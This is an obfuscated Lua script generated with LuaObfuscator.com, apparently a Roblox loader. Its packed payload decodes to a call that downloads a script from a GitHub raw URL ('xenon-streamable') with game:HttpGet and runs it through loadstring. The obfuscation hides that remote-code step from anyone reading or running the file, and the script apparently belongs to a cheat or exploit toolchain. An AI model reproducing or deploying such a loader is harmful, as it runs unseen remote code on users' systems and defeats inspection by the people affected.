--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.5) ~  Much Love, Ferib 

]]--

do local v0=0;local v1;local v2;local v3;local v4;local v5;local v6;local v7;local v8;local v9;local v10;local v11;local v12;local v13;local v14;local v15;local v16;while true do if (v0==3) then v10=getfenv or function()return _ENV;end ;v11=setmetatable;v12=pcall;v0=4;end if (v0==2) then v7=table.concat;v8=table.insert;v9=math.ldexp;v0=3;end if (v0==5) then v16=nil;v16=function(v20,v21,...)local v27=0;local v28;local v29;local v30;local v31;local v32;local v33;local v34;local v35;local v36;local v37;local v38;local v39;while true do if (v27==0) then v28=1;v29=nil;v20=v5(v4(v20,5),"..",function(v40)if (v2(v40,2)==79) then local v83=0;while true do if (v83==0) then v29=v1(v4(v40,1,1));return "";end end else local v84=v3(v1(v40,16));if v29 then local v102=v6(v84,v29);v29=nil;return v102;else return v84;end end end);v30=nil;v27=1;end if (v27==4) then v37=nil;v37=function(...)return {...},v13("#",...);end;v38=nil;v38=function()local v48=623 -(190 + 433) ;local v49;local v50;local v51;local v52;local v53;local v54;local v55;while true do if (v48==(14 -11)) then v55=nil;while true do local v103=0 -0 ;while true do if (v103==0) then if (0==v49) then local v112=0 + 0 ;while true do if (v112~=2) then else v49=1 + 0 ;break;end if (v112~=(1109 -(351 + 758))) then else v50={};v51={};v112=1 + 0 ;end if ((2 -1)~=v112) then else v52={};v53={v50,v51,nil,v52};v112=1107 -(271 + 834) ;end end end if ((871 -(529 + 340))~=v49) then else local v113=646 -(109 + 537) ;while true do if (v113==0) then for v119=1,v33() do local v120=0 + 0 ;local v121;local v122;local v123;while true do if (v120==1) then v123=nil;while true do if (v121~=1) then else while true do if (v122==0) then v123=v31();if (v30(v123,1 + 0 ,1)==0) then local v168=0;local v169;local v170;local v171;local v172;local v173;while true do if ((0 -0)==v168) then v169=0;v170=nil;v168=1 + 0 ;end if (v168~=(2 -1)) then else v171=nil;v172=nil;v168=8 -6 ;end if (v168==(4 -2)) then v173=nil;while true do if (v169==2) then while true do if (v170==(1 + 0)) then local v186=0;while true do if (v186==(1 + 0)) then v170=476 -(180 + 294) ;break;end if (v186~=0) then else v173={v32(),v32(),nil,nil};if (v171==0) then local v193=0 + 0 ;local v194;local v195;while true do if (1~=v193) then else while true do if (v194==(0 + 0)) then v195=0;while true do if (v195==(1387 -(526 + 861))) then v173[14 -11 ]=v32();v173[4]=v32();break;end end break;end end break;end if (v193~=0) then else v194=0;v195=nil;v193=1;end end elseif (v171==(810 -(158 + 651))) then v173[3]=v33();elseif (v171==2) then v173[95 -(88 + 4) ]=v33() -((200 -(16 + 182))^(7 + 9)) ;elseif (v171==3) then local v202=0 + 0 ;local v203;local v204;while true do if (1~=v202) then else while true do if (v203~=0) then else v204=0 -0 ;while true do if (v204==0) then v173[1849 -(918 + 928) ]=v33() -((2 + 0)^16) ;v173[4]=v32();break;end end break;end end break;end if (v202~=(0 + 0)) then else v203=0 + 0 ;v204=nil;v202=1;end end end v186=1;end end end if (v170~=0) then else local v187=0;local v188;while true do if (v187==0) then v188=0;while true do if (v188~=0) then else v171=v30(v123,2,1 + 2 );v172=v30(v123,570 -(16 + 550) ,7 -1 );v188=1;end if (1~=v188) then else v170=1;break;end end break;end end end if (3==v170) then if (v30(v172,122 -(4 + 115) ,3)==(1028 -(494 + 533))) then v173[4]=v55[v173[4]];end v50[v119]=v173;break;end if (v170==(1928 -(1703 + 223))) then local v190=0 -0 ;while true do if (v190==(0 -0)) then if (v30(v172,2 -1 ,2 -1 )~=1) then else v173[2]=v55[v173[2]];end if (v30(v172,3 -1 ,2)==(1 + 0)) then v173[3 + 0 ]=v55[v173[3]];end v190=13 -(4 + 8) ;end if (v190==1) then v170=745 -(514 + 228) ;break;end end end end break;end if (v169==1) then v172=nil;v173=nil;v169=2;end if (v169==(0 -0)) then v170=0 + 0 ;v171=nil;v169=1;end end break;end end end break;end end break;end if (v121==0) then local v155=0 -0 ;local v156;while true do if (v155==(869 -(786 + 83))) then v156=1630 -(879 + 751) ;while true do if (0~=v156) then else v122=0;v123=nil;v156=1;end if (v156==(1 + 0)) then v121=1 -0 ;break;end end break;end end end end break;end if (v120==(1606 -(293 + 1313))) then v121=0 -0 ;v122=nil;v120=965 -(241 + 723) ;end end end for v124=1555 -(733 + 821) ,v33() do v51[v124-(1 + 0) ]=v38();end v113=1 + 0 ;end if (v113==(1 -0)) then for v126=1,v33() do v52[v126]=v33();end return v53;end end end v103=1;end if (v103==(1571 -(1381 + 189))) then if (v49==1) then local v114=0;local v115;while true do if (v114~=0) then else v115=0;while true do if (v115==2) then v49=2;break;end if (v115~=1) then else for v148=1,v54 do local v149=1294 -(19 + 1275) ;local v150;local v151;local v152;local v153;local v154;while true do if (v149~=0) then else v150=0 + 0 ;v151=nil;v149=1 + 0 ;end if (v149==1) then v152=nil;v153=nil;v149=1 + 1 ;end if ((2 + 0)~=v149) then else v154=nil;while true do if (v150~=(2 -0)) then else while true do if (v151~=1) then else v154=nil;while true do if (v152~=(1492 -(703 + 788))) then else if (v153==(1 + 0)) then v154=v31()~=(0 -0) ;elseif (v153==2) then v154=v34();elseif (v153==(1 + 2)) then v154=v35();end v55[v148]=v154;break;end if (0~=v152) then else local v181=1799 -(978 + 821) ;while true do if (v181==(281 -(101 + 180))) then local v184=0;local v185;while true do if (v184==(0 + 0)) then v185=0 + 0 ;while true do if (v185==(0 -0)) then v153=v31();v154=nil;v185=4 -3 ;end if (v185==1) then v181=1;break;end end break;end end end if (v181~=(1 + 0)) then else v152=1;break;end end end end break;end if (v151~=(0 + 0)) then else local v178=0;local v179;while true do if (v178==0) then v179=0 + 0 ;while true do if (0==v179) then v152=0;v153=nil;v179=646 -(641 + 4) ;end if ((3 -2)~=v179) then else v151=1048 -(104 + 943) ;break;end end break;end end end end break;end if (v150==0) then local v163=0;while true do if (v163==1) then v150=1621 -(369 + 1251) ;break;end if (v163~=0) then else v151=0;v152=nil;v163=1;end end end if (v150==(1 -0)) then local v164=0;while true do if (v164==(1467 -(664 + 803))) then v153=nil;v154=nil;v164=1 + 0 ;end if (v164==(1 + 0)) then v150=2;break;end end end end break;end end end v53[453 -(179 + 271) ]=v31();v115=2 + 0 ;end if (v115==(0 -0)) then local v129=812 -(172 + 640) ;while true do if (v129~=0) then else v54=v33();v55={};v129=1;end if (v129~=(2 -1)) then else v115=1;break;end end end end break;end end end break;end end end break;end if (v48==(1 + 0)) then v51=nil;v52=nil;v48=2;end if (v48==(2 + 0)) then v53=nil;v54=nil;v48=8 -5 ;end if (v48==(0 -0)) then v49=0;v50=nil;v48=1;end end end;v27=5;end if (v27==3) then v34=function()local v56=0 -0 ;local v57;local v58;local v59;local v60;local v61;local v62;while true do if (v56==(3 -0)) then if (v61==(1518 -(119 + 1399))) then if (v60==(0 -0)) then return v62 * (0 -0) ;else local v111=0 + 0 ;while true do if (v111==(1511 -((1054 -(241 + 86)) + 784))) then v61=415 -(412 + (5 -3)) ;v59=0 -(0 -0) ;break;end end end elseif (v61==(1723 + 219 + 105)) then return ((v60==(0 -0)) and (v62 * ((2 -1)/(0 -0)))) or (v62 * NaN) ;end return v9(v62,v61-(1968 -(644 + 301)) ) * (v59 + (v60/((1 + 1)^(1668 -(422 + (3159 -1965)))))) ;end if (v56==((1141 -(897 + 244)) -0)) then v57=v33();v58=v33();v56=1 + 0 ;end if (v56==(3 -2)) then v59=(3 -2) + 0 ;v60=(v30(v58,1410 -(557 + (1501 -(128 + 521))) ,58 -38 ) * ((1 + 1)^(73 -41))) + v57 ;v56=2 + 0 ;end if (v56==(5 -(6 -3))) then v61=v30(v58,(1154 -(38 + 26)) -(12 + (3027 -(549 + 1421))) ,5 + 26 );v62=((v30(v58,492 -(63 + 397) )==(960 -(834 + 125))) and  -(1 + 0 + 0)) or (2 -1) ;v56=3 + 0 ;end end end;v35=nil;v35=function(v41)local v63=909 -(412 + 497) ;local v64;local v65;while true do if (v63==(1798 -(736 + 1059))) then return v7(v65);end if (v63==((1769 -(121 + 1645)) -2)) then v64=v4(v20,v28,(v28 + v41) -(1 + 0) );v28=v28 + v41 ;v63=2 -0 ;end if (v63==(3 -1)) then v65={};for v104=704 -(384 + 319) , #v64 do v65[v104]=v3(v2(v4(v64,v104,v104)));end v63=3;end if (v63==(19 -(17 + 1 + 1))) then v64=nil;if  not v41 then local v106=0 -(0 -0) ;while true do if (v106==(0 -0)) then v41=v33();if (v41==(0 -0)) then return "";end break;end end end v63=785 -(538 + 246) ;end end end;v36=v33;v27=4;end if (v27==2) then v32=function()local v66=0;local v67;local v68;while true do if (v66==(2 -1)) then return (v68 * (903 -647)) + v67 ;end if (v66==(0 + 0)) then v67,v68=v2(v20,v28,v28 + (125 -(18 + (241 -136))) );v28=v28 + (1967 -(88 + 1878)) + 1 ;v66=1697 -(1351 + 345) ;end end end;v33=nil;v33=function()local v69=0;local v70;local v71;local v72;local v73;while true do if ((0 -0)==v69) then v70,v71,v72,v73=v2(v20,v28,v28 + (7 -4) );v28=v28 + (746 -(27 + 715)) ;v69=1 + 0 ;end if (v69==(1 + 0)) then return (v73 * 16777216) + (v72 * 65536) + (v71 * ((2267 -1578) -433)) + v70 ;end end end;v34=nil;v27=3;end if (5==v27) then v39=nil;v39=function(v42,v43,v44)local v74=v42[1];local v75=v42[2];local v76=v42[3];return function(...)local v78=1;local v79= -1;local v80={...};local v81=v13("#",...) -1 ;local function v82()local v85=v74;local v86=v75;local v87=v76;local v88=v37;local v89={};local v90={};local v91={};for v98=1738 -(188 + 1550) ,v81 do if ((v98>=v87) or ((3465 -(510 + 1348))==(50 + 315))) then v89[v98-v87 ]=v80[v98 + 1 + 0 ];else v91[v98]=v80[v98 + (11 -(9 + 1)) ];end end local v92=(v81-v87) + 1 + 0 ;local v93;local v94;while true do local v99=0 + (395 -(291 + 104)) ;local v100;while true do if ((v99==(0 + 0)) or ((4356 -(225 + (1482 -946)))>=(3894 -(153 + 11)))) then v100=0 -0 ;while true do if (((2452 + 50)<=(5140 -(308 + 720))) and (v100==(0 -0))) then local v116=1350 -(752 + 598) ;while true do if ((v116==(1072 -(957 + 114))) or ((2562 -937)>=(4075 -(73 + 215)))) then v100=1;break;end if (((1241 -(281 + 87))<=(10162 -5731)) and (v116==(0 + 0))) then v93=v85[v78];v94=v93[1799 -(1470 + 328) ];v116=175 -(28 + 146) ;end end end if (((1 -0)==v100) or (((1266 + 5109) -(711 + (2598 -(1020 + 764))))<=(1049 + 1615))) then if ((v94<=(1 + 1)) or ((1100 + 1327)<=(790 -234))) then if ((v94<=0) or ((3867 -1591)<(2038 -(12 + 57)))) then do return;end elseif ((v94>(1 + 0 + 0)) or ((24357 -19416)==(1992 -(63 + 863)))) then local v130=0 -0 ;local v131;local v132;local v133;while true do if ((((2632 -(669 + 387)) + 2854)<=(4374 + 116)) and (v130==(1969 -(57 + 1911)))) then v133=nil;while true do if (((75 + 56)<(3830 -((373 -242) + 242))) and (v131==1)) then while true do if ((v132==(0 -0)) or (2803==(2684 -1715))) then v133=v93[530 -(227 + 301) ];v91[v133]=v91[v133](v14(v91,v133 + 1 + 0 ,v79));break;end end break;end if ((v131==(54 -(6 + 48))) or ((3860 -(909 + 879))<=(81 + 23))) then v132=0 + 0 ;v133=nil;v131=3 -2 ;end end break;end if ((v130==(0 -0)) or ((3886 + 160)<(9008 -6355))) then v131=1929 -(1596 + 24 + 309) ;v132=nil;v130=844 -(327 + 516) ;end end else v91[v93[2]]();end elseif ((v94<=(4 + 0)) or ((11814 -8129)>=(4388 -(358 + 316)))) then if ((v94==(2 + 1)) or ((10480 -6746)==(78 + 12))) then local v134=0 + 0 ;local v135;local v136;local v137;while true do if ((v134==(335 -(278 + 56))) or ((9338 -5068)<=1092)) then v137=nil;while true do if (((73 + 608)<(2762 -(930 + 672))) and ((1902 -(1865 + 37))==v135)) then local v157=0 + (0 -0) ;while true do if ((v157==((3 -2) -0)) or ((3812 -(192 + 1716))>=(1072 + 1724))) then v135=1 -0 ;break;end if (((4253 -(154 + 609 + 186))<=(5399 -(1555 + 157))) and (v157==(0 -0))) then v136=v93[(81 -(33 + 45)) -1 ];v137=v91[v93[3]];v157=3 -2 ;end end end if (((5098 -(842 + 899))>=(1279 + 173)) and (v135==(1 + 0))) then v91[v136 + 1 + 0 ]=v137;v91[v136]=v137[v93[5 -1 ]];break;end end break;end if (((3267 -1489)>=(1049 -520)) and (v134==(1827 -(1512 + (864 -549))))) then v135=0;v136=nil;v134=1;end end else v91[v93[2]]=v44[v93[1298 -(702 + (1060 -467)) ]];end elseif (((302 + 4274)==(4635 -(34 + 25))) and (v94==(4 + 1))) then local v140=0 + 0 ;local v141;local v142;local v143;local v144;local v145;while true do if (((2890 + 951)==(5068 -(794 + 433))) and (v140==1)) then v143=nil;v144=nil;v140=2;end if ((v140==(0 + 0)) or (359>1470)) then v141=0 -0 ;v142=nil;v140=1962 -((1976 -(23 + 21)) + 29) ;end if ((v140==(1 + (1 -0))) or ((711 + 398 + 715)>(2708 + 2190))) then v145=nil;while true do if (((4534 -(845 + 611))<(4777 -(410 + 1268))) and (v141==2)) then for v165=v142,v79 do local v166=(0 -0) + 0 ;local v167;while true do if (((5825 -((982 -(776 + 192)) + 1312))>(1010 + 2289)) and (v166==0)) then v167=0 + 0 ;while true do if (((3834 + 216)>3176) and (v167==((1145 + 796) -((2362 -1439) + (2535 -(1455 + 62)))))) then v145=v145 + (3 -2) ;v91[v165]=v143[v145];break;end end break;end end end break;end if (((2439 -698)>=1529) and (v141==(1410 -(1305 + (566 -(428 + 34)))))) then local v161=0 -(200 -(93 + 107)) ;while true do if ((v161==(1 + (0 -0))) or (2199>=(623 + 2776))) then v141=2 -0 ;break;end if ((v161==(738 -(531 + 207))) or ((1413 + 3295)<=(839 -(283 + 113)))) then v79=(v144 + v142) -((4 -3) -0) ;v145=0;v161=(1309 -(1123 + 185)) + 0 ;end end end if ((v141==(0 + 0)) or (4861<=4485)) then v142=v93[2 + 0 ];v143,v144=v88(v91[v142](v14(v91,v142 + (2 -1) ,v93[499 -(274 + (836 -(539 + 75))) ])));v141=1 + 0 ;end end break;end end else v91[v93[970 -(699 + 269) ]]=v93[8 -5 ];end v78=v78 + (2 -1) ;break;end end break;end end end end A,B=v37(v12(v82));if  not A[1] then local v101=v42[4][v78] or "?" ;error("Script error at ["   .. v101   .. "]:"   .. A[2] );else return v14(A,2,B);end end;end;return v39(v38(),{},v21)(...);end if (v27==1) then v30=function(v45,v46,v47)if v47 then local v95=(v45/(((605 -(195 + 403)) -5)^(v46-((629 -430) -(190 + 8)))))%((4 -2)^(((v47-(1 + 0)) -(v46-(4 -3))) + (81 -(75 + 5)))) ;return v95-(v95%1) ;else local v96=0 -0 ;local v97;while true do if (v96==(0 -0)) then v97=(2 + 0)^(v46-((5640 -4146) -(1070 + 423))) ;return (((v45%(v97 + v97))>=v97) and (2 -1)) or (0 -0) ;end end end end;v31=nil;v31=function()local v77=v2(v20,v28,v28);v28=v28 + 1 ;return v77;end;v32=nil;v27=2;end end end;v16("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574034C3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C305349582F78656E6F6E2D73747265616D61626C652F6D61696E2F6C6F616425323067657467656E7600083O0012043O00013O001204000100023O002003000100010003001206000300044O0005000100034O00025O00022O00013O000100016O00017O00083O00023O00023O00023O00023O00023O00023O00023O00033O00",v10(),...);break;end if (v0==4) then v13=select;v14=unpack or table.unpack ;v15=tonumber;v0=5;end if (v0==0) then v1=tonumber;v2=string.byte;v3=string.char;v0=1;end if (v0==1) then v4=string.sub;v5=string.gsub;v6=string.rep;v0=2;end end end
